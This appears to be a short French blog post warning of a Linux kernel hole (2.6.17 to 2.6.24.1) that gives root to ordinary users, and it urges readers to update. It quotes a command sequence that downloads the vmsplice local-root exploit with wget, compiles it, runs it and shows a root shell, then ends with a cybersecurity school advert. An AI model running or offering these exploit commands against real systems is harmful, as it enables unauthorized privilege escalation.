Grosse faille dans les noyaux Linux !
Prévenu par Koreus et vu plus en détails sur l’excellent site Tux-planet, une horrible faille dans les kernels 2.6.17 à 2.6.24.1.
L’exploit dont parle Tux-Planet permet donc d’obtenir un accès root sur n’importe quelle machine à partir d’un compte user standard…
Ca craint un peu beaucoup. Pensez donc à mettre à jour votre Kernel. (opération délicate quand même !)
Voici un extrait de l’article de Tux Planet que je vous invite à consulter ici.
cd /tmp wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c ./vmsplice-local-root-exploit … [root@localhost tmp]# id uid=0(root) gid=0(root) groups=505(sbilbeau)
Merci encore à Koreus et à Pti-Seb
Que faire après le bac quand on est passionné de cybersécurité ?
Entièrement dédiée à la cybersécurité, l'école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l'école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).